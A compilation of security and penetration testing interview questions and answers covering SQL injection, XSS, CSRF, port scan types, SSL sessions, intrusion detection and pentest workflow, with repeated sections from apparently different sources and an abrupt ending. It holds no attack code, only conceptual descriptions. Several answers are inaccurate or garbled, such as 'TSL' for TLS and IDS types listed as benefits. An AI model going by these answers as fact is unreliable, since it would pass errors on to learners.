Q#1. What is security testing?

Ans. Security testing can be considered most important in all type of software testing. Its main objective
is to find vulnerabilities in any software (web or networking) based application and protect their data
from possible attacks or intruders.
As many applications contains confidential data and needs to be protected being leaked. Software
testing needs to be done periodically on such applications to identify threats and to take immediate
action on them.
Q#2. What is “vulnerability”?
Ans. The vulnerability can be defined as weakness of any system through which intruders or bugs can
attack on the system.
If security testing has not been performed rigorously on the system then chances of vulnerabilities get
increase. Time to time patches or fixes requires preventing a system from the vulnerabilities.
Q#3. What is the intrusion detection?
Ans. Intrusion detection is a system which helps in determining possible attacks and deal with it.
Intrusion detection includes collecting information from many systems and sources, analysis of the
information and find out the possible ways of attack on the system.
Intrusion detection check following:
1. Possible attacks
2. Any abnormal activity
3. Auditing the system data
4. Analysis of different collected data etc.
Q#4. What is “sql injection”?
Ans. Sql injection is one of the common attacking techniques used by hackers to get the critical data.
Hackers check for any loop hole in the system through which they can pass sql queries which by passed
the security checks and return back the critical data. This is known as sql injection. It can allow hackers to
steal the critical data or even crash a system.
Sql injections are very critical and needs to be avoided. Periodic security testing can prevent these kind
of attacks. Sql database security needs to be define correctly and input boxes and special characters
should be handled properly.
Q#5. List the attributes of security testing?
Ans. There are following seven attributes of security testing:
1. Authentication
2. Authorization
3. Confidentiality
4. Availability
5. Integrity
6. Non-repudiation
7. Resilience
Q#6. What is xss or cross site scripting?
Ans. Xss or cross site scripting is type of vulnerability that hackers used to attack web applications.
It allows hackers to inject html or javascript code into a web page which can steal the confidential
information from the cookies and returns to the hackers. It is one of the most critical and common
technique which needs to be prevented.
Q#7. What is ssl connection and an ssl session?
Ans. Ssl or secured socket layer connection is a transient peer-to-peer communications link where each
connection is associated with one ssl session.
Ssl session can be defines as association between client and server generally crated by handshake
protocol. There are set of parameters are defined and it may be share by multiple ssl connections.
Q#8. What is “penetration testing”?
Ans. Penetration testing is on the security testing which helps in identifying vulnerabilities in a system.
Penetration test is an attempt to evaluate the security of a system by manual or automated techniques
and if any vulnerability found testers uses that vulnerability to get deeper access to the system and
found more vulnerabilities. The main purpose of this testing to prevent a system from any possible
attacks.
Penetration testing can be done by two ways –white box testing and black box testing.
In white box testing all the information is available with the testers whereas in black box testing testers
don’t have any information and they test the system in real world scenario to find out the vulnerabilities.
Q#9. Why “penetration testing” is important?
Ans. Penetration testing is important because-
1. Security breaches and loop holes in the systems can be very costly as threat of attack is always
possible and hackers can steal the important data or even crash the system.
2. It is impossible to protect all the information all the time. Hackers always come with new
techniques to steal the important data and its necessary for testers as well to perform the
testing periodically to detect the possible attacks.
3. Penetration testing identifies and protects a system by above mentioned attacks and helps
organizations to keep their data safe.
Q#10. Name the two common techniques used to protect a password file?
Ans. Two common techniques to protect a password file are- hashed passwords and a salt value or
password file access control.
Q#11. List the full names of abbreviations related to software security?
Ans. Abbreviations related to software security are:
1. Ipsec – internet protocol security is a suite of protocols for securing internet
2. Osi – open systems interconnection
3. Isdn integrated services digital network
4. Gosip- government open systems interconnection profile
5. Ftp – file transfer protocol
 6. Dba – dynamic bandwidth allocation
7. Dds – digital data system
8. Des – data -encryption standard
9. Chap – challenge handshake authentication protocol
10. Bonding – bandwidth on demand interoperability group
11. Ssh – the secure shell
12. Cops common open policy service
13. Isakmp – internet security association and key management protocol
14. Usm – user-based security model
15. Tls – the transport layer security
Q#12. What is iso 17799?
Ans. Iso/iec 17799 is originally published in uk and defines best practices for information security
management. It has guidelines for all organizations small or big for information security.
Q#13. List down some factors that can cause vulnerabilities?
Ans. Factors causing vulnerabilities are:
1. Design flaws – if there are loop holes in the system that can allow hackers to attack the system
easily.
2. Passwords – if passwords are known to hackers they can get the information very easily.
Password policy should be followed rigorously to minimize the risk of password steal.
3. Complexity – complex software can open the doors on vulnerabilities.
4. Human error – human error is a significant source of security vulnerabilities.
5. Management – poor management of the data can lead to the vulnerabilities in the system.
1. Q#14. List the various methodologies in security testing?
White Box- All the information are provided to the testers.
2. Black Box- No information is provided to the testers and they can test the system in real world
scenario.
3. Grey Box- Partial information is with the testers and rest they have to rest on their own.
Q#15. List down the seven main types of security testing as per Open Source Security Testing
methodology manual?
Ans. The seven main types of security testing as per Open Source Security Testing methodology manual
are:
1. Vulnerability Scanning: Automated software scans a system against known vulnerabilities.
2. Security Scanning:Manual or automated technique to identify network and system weaknesses.
3. Penetration testing: Penetration testing is on the security testing which helps in identifying
vulnerabilities in a system.
4. Risk Assessment: It involves analysis of possible risk in the system. Risks are classified as Low,
Medium and High.
5. Security Auditing:Complete inspection of systems and applications to detect vulnerabilities.
6. Ethical hacking:Hacking done on a system to detect flaws in it rather than personal benefits.
7. Posture Assessment:This combines Security scanning, Ethical Hacking and Risk Assessments to
show an overall security posture of an organization.
Q#16. What is SOAP and WSDL?
Ans. SOAP or Simple Object Access Protocol is a XML-based protocol through which applications
exchange information over HTTP. XML requests are send by web services in SOAP format then a SOAP
client sends a SOAP message to the server. The server responds back again with a SOAP message along
with the requested service.
Web Services Description Language (WSDL): is an XML formatted language used by UDDI. “Web Services
Description Language describes Web services and how to access them”.
Q#17. List the parameters that define an SSL session connection?
Ans. The parameters that define an SSL session connection are:
1. Server and client random
2. Server write MACsecret
3. Client write MACsecret
4. Server write key
5. Client write key
6. Initialization vectors
7. Sequence numbers
Q#18. What is file enumeration?
Ans. This kind of attack uses the forceful browsing with the URL manipulation attack. Hackers can
manipulate the parameters in url string and can get the critical data which generally not open for public
such as achieved data, old version or data which in under development.
Q#19. List the benefits that can be provided by an intrusion detection system?
Ans. There are three benefits of an intrusion detection system.
1. NIDS or Network Intrusion Detection
2. NNIDS or Network Node Intrusion detection system
3. HIDS or Host Intrusion Detection System
Q#20. What is HIDS?
Ans. HIDS or Host Intrusion Detection system is a system in which snapshot of the existing system is
taken and compares with the previous snap shot. It checks if critical files were modified or deleted then
a alert is generated and send to the administrator.
Q#21. List down the principal categories of SET participants?
Ans. Following are the participants:
1. Cardholder
2. Merchant
3. Issuer
4. Acquirer
5. Payment gateway
6. Certification authority
Q#22. Explain “URL manipulation”?
Ans. URL manipulation is a type of attack in which hackers manipulate the website URL to get the critical
information. The information is passed in the parameters in the query string via HTTP GET method
between client and server. Hackers can alter the information between these parameters and get the
authentication on the servers and steal the critical data.
In order to avoid this kind of attacks security testing of URL manipulation should be done. Testers
themselves can try to manipulate the URL and check for possible attacks and if found they can prevent
these kinds of attacks.
Q#23. What are the three classes of intruders?
Ans. Following are the three classes of intruders:
1. Masquerader: It can be defined as an individual who is not authorized on the computer but hack
the system's access control and get the access of authenticated user's account.
2. Misfeasor: In this case user is authenticated to use the system resources but he miss uses his
access on the system.
3. Clandestine user It can be defined as an individual who hacks the control system of the system
and bypasses the system security system.
Q#24. List the component used in SSL?
Ans. Secure Sockets Layer protocol or SSL is used to make secure connection between client and
computers. Below are the component used in SSL:
1. SSL Recorded protocol
2. Handshake protocol
3. Change Cipher Spec
4. Encryption algorithms
Q#25. What is port scanning?
Ans. Ports are the point from where information goes in and out of any system. Scanning of the ports to
find out any loop holes in the system are known as Port Scanning. There can be some weak points in the
system to which hackers can attack and get the critical information. These points should be identified
and prevented from any misuse.

1. Strobe: Scanning of known services.

2. UDP: Scanning of open UDP ports
3. Vanilla: In this scanning the scanner attempts to connect to all 65,535 ports.
4. Sweep: The scanner connects to the same port on more than one machine.
5. Fragmented packets: The scanner sends packet fragments that get through simple packet filters
in a firewall
6. Stealth scan: The scanner blocks the scanned computer from recording the port scan activities.
7. FTP bounce: The scanner goes through an FTP server in order to disguise the source of the scan.
Q#26. What is a Cookie?
Ans. Cookie is a piece of information received from web server and stored in a web browser which can
be read anytime later. Cookie can contain password information, some auto fill information and if any
hackers get these details it can be dangerous. Learn here how to test website cookies.
Q#27. What are the types of Cookies?
Ans. Types of Cookies are:
 Session Cookies – These cookies are temporary and last in that session only.
 Persistent cookies – These cookies stored on the hard disk drive and last till its expiry or

manually removal of it.

Q#28. What is a honeypot?
Ans. Honeypot is fake computer system which behaves like a real system and attracts hackers to attack
on it. Honeypot is used to find out loop holes in the system and to provide solution for these kinds of
attacks.
Q#29. List the parameters that define an SSL session state?
Ans. The parameters that define an SSL session state are:
1. Session identifier
2. Peer certificate
3. Compression method
4. Cipher spec
5. Master secret
6. Is resumable
Q#30. Describe Network Intrusion Detection system?
Ans. Network Intrusion Detection system generally known as NIDS. It is used for analysis of the passing
traffic on the entire sub-net and to match with the known attacks. If any loop hole identified then
administrator receives an alert.

1. Explain what cross-site scripting (XSS) is all about.

This is a type of cyber-attack where malicious pieces of code, or even scripts, can be covertly injected
into trusted websites. These kinds of attacks typically occur when the attacker uses a vulnerable Web-
based application to insert the malicious lines of code. This can occur on the client side or the browser
side of the application. As a result, when an unsuspecting victim runs this particular application, their
computer is infected and can be used to access sensitive information and data. A perfect example of this
is the contact form, which is used on many websites. The output that is created when the end user
submits their information is often not encoded, nor is it encrypted.
2. What exactly is data packet sniffing, and what are some of the most widely used tools?
Data packet sniffing is a specific process in which network traffic can be captured ether across the entire
IT Infrastructure, or just certain parts of it. Once this has been accomplished, then a deep analysis of the
data packets in question can then be made.
For example, if a business or a corporation is hit by a cyber-attack, examining the network traffic and the
data packets that were associated with it at the time of the security breach occurred becomes extremely
crucial, especially from the standpoint of forensics. Even if no attack is imminent, it is still very crucial for
the IT staff to conduct a check on their network traffic in order to determine if there is any sort of
anomaly that is present. There are many data packet sniffing tools that are available today, but probably
the most widely-used one is Wireshark.
3. Please provide the exact names of the following abbreviations that are commonly used in
pentesting: 2FA, 2S2D, 2VPCP, 3DES, 3DESE, 3DESEP.
The acronyms stand for the following:
 2FA means “Two-Factor Authentication”
 2SD2D means “Double-Sided, Double Density”
 2VPCP means “Two-Version Priority Ceiling Protocol”
 3DES means “Triple Data Encryption Standard”
 3DESE means “Triple Data Encryption Standard Encryption”
 3DESEP means “Triple Data Encryption Standard Encryption Protocol”
4. What are some of the most common network security vulnerabilities that a pentester
comes across?
Of course, there are countless numbers of issues that can impact the network infrastructure of an
organization, and you probably have your own stories about what you’ve encountered. The following
vulnerabilities are some of the most prevalent:
 The usage of extremely weak passwords in the network security tools themselves, which
include the routers, firewalls, network intrusion devices and so on. Very often, business entities
are in a rush to deploy these kinds of technologies, and they forget to create a robust and secure
password. This leads to them using the insecure default one set up by the vendor
 Implementing security patches on the wrong servers and related network components.
There are also times when a security patch is installed on the right machine but not configured
properly, thus leaving it wide open to a cyber-attack
 The misconfiguration of network devices, as described previously
 The use of infected portable media devices (primarily USB drives) and inserting them into a
server and other related network components
 The lack of a coherent network security policy; even if one was implemented, compliance is
still a huge issue
5. What are the different pentesting techniques?
Pentesting techniques fall into these following categories:
 Web Application Testing
 Wireless Network/Wireless Device Testing
 Network Infrastructure Services
 Social Engineering Testing
 Client-Side Application Testing
6. What network ports are commonly examined in a pentesting exercise, and what tool can
be used for this?
They are as follows:
 HTTPS (Port #443)
 FTP (Port #’s 20 & 21)
 NTP (Port #123)
 SSH (Port #22)
 HTTP (Port #80)
 Telnet (Port #23)
 SMTP (Port #25)
In these particular instances, “Nmap” is the most commonly used tool.
7. Describe in detail what SQL injection is.
This is a method in which malicious SQL code is inserted into the database or the back end of the Web-
based application. These are typically deployed into an entry-level field so that the malicious code can be
executed. This kind of attack is used primarily for heavy data-driven applications in which multiple
security vulnerabilities can be found and exploited. It should be noted that although SQL injection
attacks are primarily used to hit Web-based applications, the attacker can also target the SQL database
just by itself as well.
8. What is the primary difference between asymmetric and symmetric cryptography? Give an
example of the former.
Only one type of key is used in symmetric cryptography, and this key is known as the Private Key.
Although the main advantage of this is that this type of system is relatively easy to deploy, the primary
disadvantage of it is that if the Private Key falls outside the reach of the sending and receiving parties,
the cyber-attacker can easily capture the ciphertext and decrypt it very easily.
With asymmetric cryptography, two keys are used: the Public Key and the Private Key. The advantage of
this system is that it offers far greater levels of security as opposed to just using a Private Key, but it
requires considerably more processing power resources. An example of an asymmetric cryptography
system is Public Key Infrastructure, also known as PKI.
9. What are the permutations required for a robust SSL connection to take place?
The following characteristics are required:
 The session identifier
 A peer certificate
 An established compression method
 Any associated cipher specs
10. What are SSL and TSL?
SSL stands for “Secure Sockets Layer.” This is the de facto standard to keep all Internet connections safe
and secure. You will know that a particular website can be safely accessed when it has “HTTPS” in its URL
address. SSLs are used most in e-commerce-based applications, in which credit card and other personal
information and data is transmitted to the online merchant.
TSL stands for “Transport Layer Security” and is actually a much more updated and advanced version of
SSL. It is important to note that with TSL, it can come with three types of encryption:
 Elliptical Curve Cryptography (ECC)
 Rivest–Shamir–Adleman (RSA)
 Digital Signature Algorithm (DSA)
Level 3 Questions
This section covers advanced-level questions about penetration testing, focusing on the following:
 The SSL/TSL handshake
 The phases of a network intrusion attack
 Diffie-Hellman public key exchanges
 The establishment of network controls
 Traceout/Tracert
 Omniquad BorderSecure
 The various pentesting models
 The types of cross-site scripting (XSS)
 Cross-site request forgery
1. How exactly does SSL/TSL work?
Establishing an SSL/TSL connection works in this fashion:
 On the client side, the end user enters a URL address into their Web browser. This then
initiates the SSL/TLS connection by transmitting a particular message to the server on which the
website resides
 This server then returns a Public Key (or even a certificate) back to the end user’s Web
browser
 The browser then closely inspects this Public Key, and if all looks good, a Symmetric Key is
transmitted back to the server. If there are anomalies detected from within the Public Key, the
communications are instantly cut off
 Once the server gets the Symmetric Key, it then sends the encrypted webpage that is being
requested back to the end user’s Web browser
 The browser then decrypts the content into a form that can be easily understood by the end
user
It is important to note that this entire process can also be referred to as the SSL/TSL Handshake.
2. Describe the different phases of a network intrusion attack.
The phases are as follows:
 Reconnaissance: This is where the pentester learns more about the target they are about to
hit. This can either be done on an active or passive basis. In this step, you learn more about the
following:
 The IP address range that the target is in
 Finding out its domain name
 DNS records
 Scanning: This is the step where the pentester learns about the vulnerabilities of
the particular target. Weaknesses are found in the network infrastructure and the
associated software applications. For example, this include the following:
 Ascertaining the services that are currently being run
 Any open ports
 The detection of any firewalls
 Weaknesses of the operating system in question
 Gaining the needed access: This is the part where the pentester starts to actually initiate the
launch of the cyber-attack, based on the weaknesses and the vulnerabilities that they have
discovered in the last step
 Maintaining the access: The pentester has entered the target itself and tries to keep that
access point open so that they can extract as much private information and data as possible
 Covering their tracks: In this last step, the pentester ensures that any “footprints” left
behind in the course of their attack are covered up so that they can’t be detected. For instance,
this involves the following:
 The deletion of any log-related files
 Closing off any backdoors
 Hiding all controls that may have been used
3. What is a specific pentesting exercise that can be done with a Diffie-Hellman exchange?
This was actually one of the first Public Key protocols to be put into place, and it is a methodology that
can be utilized to securely exchange Public Keys over an open network line of communications. A pentest
can be done here in order to determine and ascertain any kind of weak/TLS services that are associated
with this exchange process.
4. After a pentest is conducted, what are some of the top network controls you would advise
your client to implement?
The following types of controls should be implemented:
 Only use those applications and software tools that are deemed “whitelisted”
 Always implement a regular firmware upgrade and software patching schedule, and make
sure that your IT staff sticks with the prescribed timetable
 With regards to the last point, it is absolutely imperative that the operating systems(s) you
utilize are thoroughly patched and upgraded
 Establish a protocol for giving out administrative privileges only on an as-needed basis, and
only to those individuals that absolutely require them
5. How does traceout/tracert exactly work?
This is used to determine exactly the route of where the data packets are exactly going. For example, this
method can be used to ascertain if data packets are being maliciously redirected, they take too long to
reach their destination, as well as the number of hops it takes for the data packets to go from the point
of origination to the point of destination.
6. What is Omniquad BorderSecure?
This is a type of specific service that can help to perform network-based audits or even automated
pentesting of an entire network infrastructure. It can give the pentesting team detailed information and
data as to how the cyber-attacker can gain access to your network-based digital assets. It can also be
used to help mitigate any form of threat that is launched by a malicious third party.
7. What number of vulnerabilities can the abovementioned service actually detect?
All types of network infrastructures can be pentested, and up to a thousand total vulnerabilities can be
detected with this particular service.
8. Describe the theoretical constructs of a threat model that can be used in a pentesting
exercise.
The constructs behind a threat model include the following:
 Gathering the required documentation
 Correctly identifying and categorizing the digital assets that are found within the IT
infrastructure of a corporation or business
 Correctly identifying and categorizing any type of kind of cyber-threat that can be targeted
towards the digital assets
 Properly correlating the digital assets with the cyber-threat that they are prone to (this is can
also be considered as a mapping exercise where a digital asset is associated with its specific
cyber-threat)
It is also important to note that there are three types of threat models that a pentesting team can use,
and they are as follows:
 Digital Asset-Centric
 Cyber-Attacker-Centric
 Software Application-Centric.
The above is an example of a Digital Asset-Centric Threat Model.
9. What are the three types of cross-site scripting (XSS)?
The three types are as follows:
 Persistent/Stored XSS: This is where the malicious input is stored onto the target server,
such as a database, and is reflected at the page where the end user entered in their information
(such as a “Contact Us” form)
 Reflected XSS: Any form of malicious user input is instantaneously returned by the Web-
based application as an “Error Message.” As a result, this data is deemed to be unsafe by the
Web browser, and it is not stored in any fashion
 DOM-based XSS: This will actually for any type or kind of client scripting language (such as
Java) to access and maliciously modify the end user input. It can also covertly alter the content,
structure and even the particular style of a webpage. The types of objects that can be
manipulated include the following:
 Document.URL
 Document.location
 Document.referrer
10. What exactly is CSRF and how can it be prevented when executing a pentest exercise?
This stands for cross-site request forgery, and it takes advantage of the trust levels that are established in
an authenticated user session. For example, in these scenarios, Web-based applications typically do not
conduct any form of verification tests that a specific request actually came from an authenticated user;
rather, the only form of verification is sent by the particular Web browser that the end user is utilizing.
There are two ways to avoid this scenario:
 Double-check the specific CSRF token that is being used
 Confirm that the specific requests are coming from within the same origin

1) Explain the Security Testing.

Security testing process is used to identify or detect the flaws in the security mechanism of the
information system. An information system basically protects data and maintains the functionality as per
user expectation and requirement.

For any application security testing is one of the most important types of testing for any application. In
this type of testing tester himself plays the role of attacker and plays around the application to find the
bugs of the system. Security testing is considered one of the most important types of testing among all
types of testing that are available today.

Q2). What is the objective of Security Testing?

Security testing is one of the most important types of testing and its objective is to find bugs or
vulnerabilities of the software or any desktop or web-based application. It is being done to protect the
data from an unexpected attack or intruder.

Many applications contain confidential data that may require protection. It must be done periodically in
order to identify the threats so that an immediate action can be taken if an attack is being done.

Q3). Define Vulnerability.

The weakness of any system due to which any bug or intruder can attack the system is known as its
vulnerability. If testing is not performed rigorously of the system then chances of attack get increased. To
avoid such attacks time to time patches and fixes are applied to prevent the system from any
unpredicted vulnerability.

Q4). Explain intrusion detection.

Intrusion detection system basically detects the possibility of an attack and many times deal with it as
well. Basically, it collects the information from a number of sources, analyzes the information and finds
out all possible ways to attack the system. It checks for the following:

 Attack possibility

 Abnormal activity detection

 System data auditing

  Data collection analysis

Q5). Explain SQL injection.

Commonly hackers attack the system with this technique that is known as SQL injection to hack all
critical data. They check and try to find any system loophole, in which they find a query that bypasses
the security check and return back critical data. This process is known as SQL injection; it can not only
hack the data but sometimes even crash the system.

The SQL injections are quite critical so must be avoided. They can be avoided by the periodic attack. SQL
databasesecurity must be defined correctly in that input boxes and special characters must be handled
properly.

Q6). What are the security testing attributes?

Following attributes are considered for security testing:

 Authentication

 Confidentiality

 Authorization

 Integrity

 Availability

 Resilience

 Non-repudiation

Q7). What do you understand by Cross Site Scripting or XSS?

Cross-site scripting is the type of vulnerability that is used by hackers to attack web applications. Through
this, the hackers inject HTML and JAVASCRIPT code into web pages through that hackers steal the
confidential information from the web page cookies that is ultimately returned to the hackers. One must
try to prevent this technique while designing the web application.

Q8). Differentiate SSL Connection and SSL Session.

SSL or secured socket layer connection is a transient connection that is established to set-up peer-to-
peer communication. In these connections, each connection has one SSL Session.
SSL session is defined as an association between client and server. Usually, handshake networking
protocol is used in these connections. The parameters that are defined in these connections must be
shared by multiple SSL connections.

Q9). Explain “Penetration Testing”.

Penetration testing is done to identify and detect the system vulnerabilities. In this testing manual and
automatic techniques are used to detect system vulnerabilities. After identification of the vulnerability,
testers try to find more vulnerability associated with this one by accessing the system deeply.

This testing helps in preventing the system from any possible attack. Testers perform this testing by two
ways either white box testing and black box testing.

In case of white box testing, all information is available with the testers, while in case of black box testing
testers test the system in the real-world environment without any information and find out the
vulnerabilities.

Why should Penetration testing be used?

Due to following reasons Penetration testing must be used by the testers:

 As threats and attacks can be done at any time so loopholes and the security breaches can be
much costly. Hackers cannot only steal the information but also crash the system.

 As hackers adopt new ways of hacking every day, so sometimes it may be difficult to protect the
information all the time. So testers must perform the testing period to detect and prevent the
attack.

 Penetration testing protects the system from the above-mentioned attacks and helps the
organizations to keep data safe.

Security Testing Questions & Answers for Experienced

Q11). How can the password file be protected?

Following two techniques are used to protect the password file:

Read: Software QA Tester Role – Job Responsibilities and Description

 Hashed Password

 Salt Value or Password File Access Control

Q12). What are the most used abbreviations and full forms that are used for Software security?
Below-listed abbreviations are used in software security and they are given with their full-forms:

 OSI- Open System Interconnection

 ISDN- Integrated Services Digital Network

 DDS-Digital Data System

 FTP-File Transfer Protocol

 GOSIP-Government Open System Interconnection Profile

 CHAP-Challenge Handshake Authentication Protocol

 SSH-The Secure Shell

 DES-Data Encryption Standard

 DBA-Dynamic Bandwidth Allocation

 COPS-Common Open Policy Services

 BONDING- Bandwidth On Demand Interoperability Group

 ISAKMP-Internet Security Association and Key Management Protocol

 USM- User-based Security Model

 TLS-The Transport Layer Security

 IPSec-Internet Protocol Security is a protocol suite used for internet security.

Q13). What are the factors that can cause vulnerability?

Below listed factors can cause vulnerability:

 Passwords- If hackers know the password then they can steal the information easily. Password
policy must be followed properly to avoid this risk.
  Design flaws- Due to design flaws the system loopholes can allow the hackers to attack system
easily

 Human Error- Human errors must be identified as they are the biggest source of vulnerabilities

 Management – Poor data management can also lead to many vulnerabilities, so they must be
also identified

 Complexity – If complex coding is being used for software then it may also result in a
vulnerability.

Q14). Define ISO 17799.

This standard is published in the UK that defines the practices that must be followed for software
security. This standard has the guidelines for all size organizations including small, medium and large size
organizations.

Q15). What are the types of testing?

Testing can be of following types:

 White Box: In this type of testing all information is provided to the testers

 Black Box Testing: In this type of testing no information is provided to the testers and they test
the application in the real-world scenario

 Grey Box Testing: Partial information is provided to the testers rest they have their own
information

Q16). As per OSS Testing methodology manual which of the seven security types exist?
As per Open Source Security Testing methodology manual following seven types of testing may exist:

 Security Scanning: It must be done to identify system or network weakness

 Vulnerability Scanning: As per this standard automated software must scan a system against any
vulnerability.

 Risk Assessment: It involves possible risk analysis of the system that can be classified as low,
medium and high
  Security Auditing: The complete system is scanned for any vulnerability

 Posture Assessment: It combines ethical hacking, security scanning, and risk assessment to
show an overall security posture of any organization

 Penetration Testing: Penetration testing helps the testers in identifying system vulnerabilities.

Q17). Explain the WSDL and SOAP.

SOAP is Simple Object Access Protocol that is an XML based protocol that is used to exchange
information over HTTP. Web services sent XML request in SOAP format and then SOAP client sends a
message to the server. The server then responds back with a SOAP message.

WSDL or Web Services Description Language is an XML formatted language that is used by UDDI. It
describes the web services and the way in which they can be used and accessed.

Question 1. Do You Filter Ports On The Firewall?

Answer :
You can filter ports on the firewall to block specific malware and protect the network from
unnecessary traffic. For instance, some companies block port 21, the FTP port, when the company
does not host or allow FTP communications.
Question 2. How Does Tracerout Or Tracert Work?
Answer :
traceroute and tracert work to determine the route that goes from the host computer to a remote
machine. It’s used to identify if packets are redirected, take too long, or the number of hops used to
send traffic to a host.
Networking Interview Questions
Question 3. What Are The Strengths And Differences Between Windows And Linux?
Answer :
Linux has some commands that Windows does not, but Windows is not open source and does not
suffer from recent hacks such as Heartbleed.
Question 4. How Can You Encrypt Email Messages?
Answer :
You can use PGP to encrypt email messages or some other form of a public private key pair system
where only the sender and the recipient can read the messages.
Networking Tutorial
Question 5. What Kind Of Penetration Can Be Done With The Diffie Hellman Exchange?
Answer :
A hacker can use the man in the middle attack with the Diffie Hellman exchange since neither side of
the exchange is authenticated. Users can use SSL or encryption between messages to add some kind
of security and authentication.
Question 6. How Do You Add Security To A Website?
Answer :
 The HTTP protocol allows for security behind authenticated pages and directories. If the user does
not enter the right username and password, the server returns a 403 authentication HTTP error. This
protects from unauthorized users.
Question 7. What Are Some Ways To Avoid Brute Force Hacks?
Answer :
You can stop authentication after a certain amount of attempts and lock the account. You can also block
IP addresses that flood the network. You can use IP restrictions on the firewall or server.
Question 8. What Type Of Tools Are There Out There For Packet Sniffing?
Answer :
Wireshark is probably the most common packet sniffing tool. This program can help you find odd traffic
across the network or identify a program that is sending traffic silently from a host.
Question 9. What Is The Difference Between Asymmetric And Symmetric Encryption?
Answer :
Symmetric encryption uses the same key for decryption and encryption. Asymmetric uses different
keys.
Question 10. Why Should We Conduct A Penetration Test?
Answer :
IT is an integral part of every company's business today. Therefore, not only the amount of business-
critical data that is stored on IT systems grows, but also the dependency on a working IT infrastructure.
This leads to an increased amount of attacks against IT systems in the form of industrial espionage,
denial of service attacks and other possibilities to significantly harm a company. Important corporate
secrets are spied on and sold to competitors.
The availability of systems is interrupted, as a non-working IT is causing more and more problems today.
No new orders are placed, because competitors somehow always have the better offer. A penetration
test gives you information about your systems' vulnerabilities, how probable a successful attack against
your infrastructure is and how you can protect yourself against potential security breaches in the future.
Question 11. Are There Legal Requirements For Penetration Tests?
Answer :
It may not be mandatory to do a penetration test for corporations, but the German law for example
includes numerous text passages in its commercial laws which could be validated by conducting a
penetration test.
Question 12. What Is The Workflow Of A Penetration Test?
Answer :
In advance of every penetration test, an individual meeting is held. In this meeting, the various
possibilities of a penetration test in relation to the customer's systems are discussed. A penetration test
only makes sense if it is realised in an individual and customer-oriented way.

Question 13. What Time Investment Do You Estimate For A Penetration Test?
Answer :
The time investment for a penetration test varies from case to case depending on the systems to be
tested and the individual test requirements. Usually, the time needed ranges from a few days to several
weeks. One goal of the preliminary meeting is to get enough information about the systems to be tested
to estimate the optimal length for the penetration test.
Human resources on the customer's side are usually only marginally bound. Most notably, a contact
person for questions during the exploitation phase is required.
Question 14. How Much Information Does Redteam Pentesting Need From Us?
Answer :
The type and amount of information needed varies with the kind of penetration test that is to be
conducted. The two concepts mentioned most often are blackbox and whitebox tests. Unfortunately,
those terms are not defined by a standard and can therefore mean different things, depending on who
you talk to.
RedTeam Pentesting usually recommends a whitebox test. Penetration tests performed as complete
blackbox tests always suffer from the fact that third parties might get involved without their explicit
consent. Providing technical information in a whitebox test scenario before the test starts also allows the
penetration testers to detect security vulnerabilities that are of importance to your company even faster
and more efficiently.
It should always be acted on the assumption that real, serious attackers are able to obtain the necessary
information prior to their attacks, or can procure it in time. A precise determination about what
information is necessary to conduct an efficient test is done individually for every client during a
preliminary meeting.
uestion 15. What Are Blackbox And Whitebox Tests?
Answer :
A blackbox test is normally defined as a test where the penetration testers do not have any more
information than attackers without internal knowledge might have. The idea is to check how deeply
potential attackers can compromise your systems without any kind of internal information or access. All
knowledge has to be gathered with classical reconnaissance (finding as much information as possible
about the target) and enumeration (a deeper look at individual systems).
Despite the requirement of having as little information in the beginning as possible, at least a few
specifications for the test have to be given, lest to unwillingly target uninvolved third parties. This does
not pose a restriction for real attackers, but for every reputable company it should go without saying that
all phases of a penetration test are only performed where explicit consent is given. This is not the case
for third party systems, that would for example be affected by a portscan of a range of systems that
presumably belong to the client the penetration test is conducted for.
In contrast, there is the whitebox test (sometimes also denoted as crystal-box test). In a whitebox test,
the penetration testers already have internal knowledge about the target systems (for example network
plans or a web application's source code) and possibly various access permissions. The latter could be an
unprivileged user account to the company network, as it is available to employees, or login credentials
for a web application like any normal customer would have.
This allows to test to what extent users with access to a system can misuse their permissions.
Additionally, internal information may be provided that is also available to every staff member of
company. This can be information about internal systems like web servers, mail servers, LDAP servers
etc., but also for example organisational structures like employee's responsibilities and positions in the
company. If only selected parts of information are divulged, this kind of test is also often called a graybox
test.
Question 16. Why Should Not Only The Network Perimeter Be Tested, But Also The Internal Network?
Answer :
If your company's network is sufficiently hardened at the perimeter systems and it was not possible to
successfully compromise it during a perimeter test, it still makes sense to additionally conduct an
internal test. Just because the perimeter systems are sufficiently secured, it does not mean that the
same precautions are taken on the internal network. Most of the time, too little security is done on the
internal network, as it is supposedly only accessible by trustworthy persons. Especially in larger
corporations though, not every employee needs the same access permissions.
The intern does not need to have the same access level as the CEO. It is therefore a severe problem if a
security vulnerability appearing in the future that allows access to the internal network eliminates all
safety precautions. If the financial incentive is big enough, it should also be no problem for attackers
(competitors, business rivals) to either bribe one of your staff members or infiltrate your organization
with somebody reporting back to them with all the data that is supposedly well guarded if seen from the
outside.
Question 17. What Types Of Systems Does Redteam Pentesting Test?
Answer :
RedTeam Pentesting tests all kinds of systems. Frequently, the security vulnerabilities that matter the
most are independent from the system's technology, making it possible to successfully test even
previously unknown types of systems. Additionally, it goes with the job of being a penetration tester to
have the ability to quickly adapt to new situations and systems.
Additionally, RedTeam Pentesting's service is not limited to the classic network- or web application
penetration test. Newly developed hardware and other products are also tested, as well as security
concepts only existing as a draft at the time of testing. In some particular cases, a penetration test
conducted in response to the detection of a security incident can help in identifying the vulnerabilities
exploited and in fixing them in a timely manner.
Question 18. Can Any Harm Be Done To Our Productive Systems During The Test?
Answer :
Unlike real attackers, RedTeam Pentesting pays great attention to a customer's production systems, so as
to not interrupt them. We always go to the greatest extent to leave all systems unharmed in a
penetration test. Attacks where the risk of a system failure is especially high are only performed with the
client's explicit consent.
All in all, it is never possible to completely rule out that a production system crashes in a penetration
test. To be able to get hold of someone as fast as possible in such a situation, emergency telephone
numbers are exchanged prior to the test.
Question 19. Are Denial-of-service Attacks Also Tested?
Answer :
Denial-of-service (DoS) attacks are usually only examined if it seems to be possible to put a system's
availability at risk with very small effort. This can for example be a misconfiguration or a program
error (say, if a system crashes when it gets sent an overly long request). Attacks like this will only be
performed after an explicit agreement is provided, to verify if the attack is indeed possible.
On the other hand, attacks that try to saturate the bandwidth a company has at its disposal are
usually not tested, as this is always possible for attackers with sufficient resources and will also affect
third-party systems. Distributed denial-of-service attacks, that usually involve hundreds, if not
thousands, of zombie systems (systems that were compromised and can now be remotely controlled)
cannot be simulated realistically.
Question 20. Does Redteam Pentesting Do Social Engineering?
Answer :
Penetration tests may include social engineering techniques. These techniques are not without
controversy though. More detailed information about the problems occuring with social engineering
